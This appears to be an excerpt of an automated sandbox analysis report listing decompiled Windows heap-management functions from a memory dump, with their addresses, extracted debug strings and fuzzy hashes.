0x00ff3d52
0x00ff3d55
0x00ff3d58
0x00ff3d5b
0x00ff3d5f
0x00ff3d61
0x00ff3d66
0x01048213
0x01048218
0x00ff4085
0x00ff4088
0x00ff408e
0x00ff4094
0x00ff409a
0x00ff40a0
0x00ff40a6
0x00ff40a9
0x00ff40af
0x00ff40b6
0x00ff40bd
0x00ff40bd
0x00ff3d83
0x0104821f
0x01048229
0x01048238
0x01048238
0x0104823d
0x0104823d
0x00ff3da0
0x00ff3daf
0x00ff3db5
0x00ff3dba
0x00ff3dba
0x00ff3dd4
0x00ff3e94
0x00ff3eab
0x00ff3f6d
0x00ff3f84
0x00ff406b
0x00ff406b
0x00ff406e
0x00ff406e
0x00ff4070
0x00ff4074
0x01048351
0x01048351
0x00ff407a
0x00ff407f
0x0104835d
0x01048370
0x01048377
0x01048379
0x0104837c
0x0104837c
0x0104835d
0x00000000
0x00ff407f
0x00ff3f8a
0x00ff3f8d
0x00ff3f90
0x00ff3f95
0x0104830d
0x0104830f
0x00ff3f9b
0x00ff3fac
0x00ff3fae
0x00ff3fb1
0x00ff3fb1
0x00ff3fb6
0x01048317
0x0104831a
0x00000000
0x00ff3fbc
0x00ff3fc1
0x00ff3fc9
0x00ff3fd7
0x00ff3fda
0x00ff3fdd
0x00ff4021
0x00ff4021
0x00ff4029
0x00ff4030
0x00ff4044
0x00ff4046
0x00ff4046
0x00ff4044
0x00ff4049
0x01048327
0x01048334
0x01048339
0x0104833c
0x00ff404f
0x00ff404f
0x00ff404f
0x00ff4051
0x00ff4056
0x00ff4063
0x00ff4063
0x00ff4068
0x00000000
0x00ff4068
0x00ff3fdf
0x00ff3fe2
0x00ff3fe4
0x00ff3fe7
0x00ff3fef
0x00ff4003
0x00ff4005
0x00ff4005
0x00ff400c
0x00ff4013
0x00ff4016
0x00ff4017
0x00ff401b
0x00ff401e
0x00000000
0x00ff401e
0x00ff3fb6
0x00ff3eb1
0x00ff3eb4
0x00ff3eb7
0x00ff3ebc
0x010482a9
0x010482ab
0x00ff3ec2
0x00ff3ed3
0x00ff3ed5
0x00ff3ed8
0x00ff3ed8
0x00ff3edd
0x010482b3
0x010482b6
0x00000000
0x00ff3ee3
0x00ff3ee8
0x00ff3eed
0x00ff3ef0
0x00ff3ef3
0x00ff3f02
0x00ff3f05
0x00ff3f08
0x010482c0
0x010482c3
0x010482c5
0x010482c8
0x010482d0
0x010482e4
0x010482e6
0x010482e6
0x010482ed
0x010482f4
0x010482f7
0x010482f8
0x010482fc
0x010482ff
0x010482ff
0x00ff3f0e
0x00ff3f11
0x00ff3f16
0x00ff3f1d
0x00ff3f31
0x01048307
0x01048307
0x00ff3f31
0x00ff3f39
0x00ff3f48
0x00ff3f4d
0x00ff3f50
0x00ff3f50
0x00ff3f53
0x00ff3f58
0x00ff3f65
0x00ff3f65
0x00ff3f6a
0x00000000
0x00ff3f6a
0x00ff3edd
0x00ff3dda
0x00ff3ddd
0x00ff3de0
0x00ff3de5
0x01048245
0x00ff3deb
0x00ff3df7
0x00ff3dfc
0x00ff3dfe
0x00ff3e01
0x00ff3e01
0x00ff3e06
0x0104824d
0x0104824f
0x01048254
0x00000000
0x00ff3e0c
0x00ff3e11
0x00ff3e16
0x00ff3e19
0x00ff3e29
0x00ff3e2c
0x00ff3e2f
0x0104825c
0x0104825f
0x01048261
0x01048264
0x0104826c
0x01048280
0x01048282
0x01048282
0x01048289
0x01048290
0x01048293
0x01048294
0x01048298
0x0104829b
0x0104829b
0x00ff3e35
0x00ff3e38
0x00ff3e3d
0x00ff3e44
0x00ff3e58
0x010482a3
0x010482a3
0x00ff3e58
0x00ff3e60
0x00ff3e6f
0x00ff3e74
0x00ff3e77
0x00ff3e77
0x00ff3e7a
0x00ff3e7f
0x00ff3e8c
0x00ff3e8c
0x00ff3e91
0x00000000
0x00ff3e91

Strings

Kernel-MUI-Language-SKU, xrefs: 00FF3F70
WindowsExcludedProcs, xrefs: 00FF3D6F
Kernel-MUI-Language-Disallowed, xrefs: 00FF3E97
Kernel-MUI-Language-Allowed, xrefs: 00FF3DC0
Kernel-MUI-Number-Allowed, xrefs: 00FF3D8C

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
Instruction ID: 59592607ab2095f4872ee66d0649f6aece3986748f00292c47ce0f1b97d3c131
Opcode Fuzzy Hash: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
Instruction Fuzzy Hash: 1BF15DB2D00219EBCB15DF98C980AEEBBF9FF48750F14406AE645E7261D734AE01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00FE40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00FEB150(", passed to %s", _t29);
					}
					_push("\n");
					E00FEB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x10d6378 = 1;
						asm("int3");
						 *0x10d6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x00fe40e6
0x00fe40e8
0x00fe40f1
0x0104042d
0x0104044c
0x01040451
0x0104042f
0x01040444
0x01040449
0x0104045d
0x01040466
0x0104046e
0x01040474
0x01040475
0x0104047a
0x0104048a
0x0104048c
0x01040493
0x01040494
0x01040494
0x00000000
0x0104049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 0104043F
RtlAllocateHeap, xrefs: 01040468
Invalid heap signature for heap at %p, xrefs: 01040458
HEAP: , xrefs: 0104044C
, passed to %s, xrefs: 01040469

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 64c49b094ddd80d6163ec7912958c4f784d77c7451c4aea8dc49a79636756740
Instruction ID: af6b4bc9d1138c17b0207bbbc2d5c07c348922d795f410a138f422371963d0fc
Opcode Fuzzy Hash: 64c49b094ddd80d6163ec7912958c4f784d77c7451c4aea8dc49a79636756740
Instruction Fuzzy Hash: 4C01407210D181AFD2255769D95FF9377E4DB80B30F14807DF10497692CFADD840E112

Uniqueness

Uniqueness Score: -1.00%

Function 0100A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0100A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x10d8748 - 1;
					if( *0x10d8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00FEB150();
									_t260 = _t257 + 4;
								} else {
									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00FEB150();
								_t257 = _t260 + 4;
								__eflags =  *0x10d7bc8;
								if(__eflags == 0) {
									E010A2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E010AA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0103D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0100AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E010AA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E010AA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x10d8748 - 1;
					if( *0x10d8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00FEB150();
							} else {
								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00FEB150();
							__eflags =  *0x10d7bc8;
							if(__eflags == 0) {
								_t131 = E010A2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x0100a83a
0x0100a83c
0x0100a83e
0x0100a841
0x0100a844
0x0100a84a
0x0100aa53
0x0100aa59
0x0100aa59
0x0100a858
0x0100a85e
0x0100aaf5
0x0100aafc
0x0105229e
0x010522a2
0x010522a8
0x010522b3
0x010522b5
0x010522bb
0x010522c1
0x010522c5
0x010522e6
0x010522eb
0x010522f0
0x010522c7
0x010522dc
0x010522e1
0x010522e1
0x010522f3
0x010522f8
0x010522fd
0x01052300
0x01052307
0x0105230e
0x0105230e
0x01052313
0x01052313
0x010522b5
0x010522a2
0x0100aafc
0x0100a864
0x0100a869
0x0100aa5c
0x0100aa5e
0x0100a86f
0x0100a87f
0x0100a885
0x0100a885
0x0100a88b
0x0100a890
0x0100a896
0x0100ab0c
0x0100ab0f
0x0100ab15
0x01052320
0x01052320
0x0100ab1b
0x0100a89c
0x0100a89f
0x0100a8a2
0x0100a8a2
0x0100a8a5
0x0100a8af
0x0100a8b3
0x0100a8b8
0x0100aa66
0x0100a8be
0x0100a8c5
0x0100a8c6
0x0100a8ce
0x01052328
0x01052332
0x01052337
0x01052337
0x0100a8ce
0x0100a8d4
0x0100a8d8
0x0100a8db
0x0100a8de
0x0100a8e1
0x0100a8e5
0x0100a8e8
0x0100a8f0
0x0100a8f3
0x0105234c
0x01052350
0x01052355
0x01052359
0x01052359
0x0100a8f9
0x0100a901
0x0100aae4
0x0100aae4
0x0100aaea
0x00000000
0x0100a907
0x0100a90a
0x0100a91d
0x0100a91d
0x00000000
0x0100a910
0x0100a910
0x0100a910
0x0100a914
0x0100a924
0x0100a924
0x0100a924
0x0100a924
0x0100a916
0x0100a91b
0x00000000
0x00000000
0x00000000
0x0100a91b
0x0100a925
0x0100a925
0x0100a932
0x0100a936
0x0100a93c
0x0100a93c
0x0100a93c
0x0100ab22
0x0100ab24
0x0100ab27
0x0100ab27
0x0100a942
0x0100a944
0x0100aaba
0x0100aabd
0x0100aac0
0x0100aac0
0x0100aac2
0x0100ab2f
0x0100aac4
0x0100aac4
0x0100aac7
0x0100aaca
0x0100aacc
0x0100aace
0x0100aace
0x0100aace
0x0100aad1
0x0100aad1
0x0100aad7
0x0100aad9
0x00000000
0x00000000
0x01052361
0x01052369
0x0105236b
0x00000000
0x01052371
0x00000000
0x01052371
0x00000000
0x0105236b
0x0100aac0
0x0100a94a
0x0100a94a
0x0100a94d
0x0100a94d
0x0100a950
0x0100a954
0x01052376
0x01052380
0x0100a95a
0x0100a95a
0x0100a95c
0x0100a95f
0x0100a961
0x0100a961
0x0100a967
0x0100a96a
0x0100a972
0x0100aa02
0x0100aa06
0x0100aa10
0x0100aa16
0x0100aa16
0x0100aa1b
0x0100aa21
0x0100aa24
0x0100aa27
0x0100aa29
0x0100aa2c
0x0100aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x0100a978
0x0100a978
0x0100a97b
0x0100a981
0x0100a996
0x0100a998
0x0100a99f
0x0100a9a2
0x0105238a
0x0100a9a8
0x0100a9a8
0x0100a9a8
0x0100a9aa
0x0100a9ad
0x0100a9b0
0x0100a9bb
0x0100a9be
0x0100a9c7
0x0100a9c9
0x0100a9c9
0x0100a9cc
0x0100a9d1
0x0100aa6d
0x0100aa70
0x0100aa73
0x0100aa75
0x0100aa79
0x0100aa7e
0x0100aa82
0x0100aa8f
0x0100aa94
0x0100aa96
0x01052392
0x010523a1
0x010523a1
0x0100aa9c
0x0100aa9f
0x0100aaa2
0x0100aaa2
0x0100aaa8
0x0100aaab
0x0100aaaf
0x00000000
0x0100aab5
0x00000000
0x0100aab5
0x0100a9d7
0x0100a9d7
0x0100a9da
0x0100a9e0
0x0100a9e3
0x0100a9e6
0x0100a9e9
0x0100a9eb
0x0100a9fd
0x0100a9fd
0x00000000
0x0100a9eb
0x00000000
0x00000000
0x00000000
0x0100a983
0x0100a983
0x0100a983
0x0100a987
0x0100a995
0x0100a995
0x0100a995
0x0100a995
0x0100a989
0x0100a98e
0x00000000
0x0100a990
0x00000000
0x0100a990
0x0100a98e
0x00000000
0x0100a983
0x0100a972
0x0100a90a
0x0100aa34
0x0100aa34
0x0100aa40
0x0100aa43
0x0100aa46
0x0100aa4d
0x010523ab
0x010523b2
0x010523b8
0x010523be
0x010523c3
0x010523c5
0x010523cb
0x010523d1
0x010523d5
0x010523f6
0x010523fb
0x010523d7
0x010523ec
0x010523f1
0x01052403
0x01052408
0x01052410
0x01052417
0x01052422
0x01052422
0x01052417
0x010523c5
0x010523b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01052403
HEAP[%wZ]: , xrefs: 010522D7, 010523E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010522F3
HEAP: , xrefs: 010522E6, 010523F6

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: f5c6c97c2b016fe4f9487355fe19219a64f8376ca095c6c8c3748e89dd7e84bc
Instruction ID: 90adfe1d1205f3aadd832ffe2483cc62af62c0a0e9651938347466a804d85c83
Opcode Fuzzy Hash: f5c6c97c2b016fe4f9487355fe19219a64f8376ca095c6c8c3748e89dd7e84bc
Instruction Fuzzy Hash: DFD1BF34B00746DFEB5ACF68C490BAAB7F1BF48300F1585A9D9969B382D334A981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0100A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0100A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0100DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01029730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E010AA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01029660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00FEB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01007D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E010A138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01007D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01007D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E010A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01007D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01007D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E010A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0103D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x0100a229
0x0100a231
0x0100a23f
0x0100a242
0x0100a244
0x0100a24c
0x0100a255
0x0100a25a
0x0100a25f
0x01051c76
0x01051c78
0x01051c7e
0x01051c7f
0x01051c81
0x01051c82
0x01051c84
0x01051c89
0x01051c8b
0x01051c9e
0x01051c9e
0x01051cab
0x01051cb2
0x00000000
0x01051cb2
0x01051c8d
0x01051c92
0x00000000
0x00000000
0x01051c94
0x01051c98
0x00000000
0x00000000
0x00000000
0x01051c98
0x0100a265
0x0100a265
0x0100a266
0x0100a26f
0x0100a270
0x0100a276
0x0100a277
0x0100a279
0x0100a27e
0x0100a282
0x01051db5
0x01051dbb
0x01051dc1
0x01051dc5
0x01051de4
0x01051de9
0x01051dc7
0x01051ddc
0x01051de1
0x01051def
0x01051df3
0x01051df7
0x01051dfe
0x01051e06
0x0100a302
0x0100a308
0x0100a308
0x0100a288
0x0100a28d
0x0100a294
0x01051cc1
0x0100a29a
0x0100a29a
0x0100a29a
0x0100a29f
0x01051ccb
0x01051cd1
0x01051cd8
0x01051cea
0x01051cea
0x01051cd8
0x0100a2a9
0x0100a2af
0x0100a2bc
0x01051cfd
0x0100a2c2
0x0100a2c2
0x0100a2c2
0x0100a2c7
0x01051d07
0x01051d0d
0x01051d14
0x01051d1f
0x01051d21
0x01051d2c
0x01051d2c
0x01051d2c
0x01051d47
0x01051d47
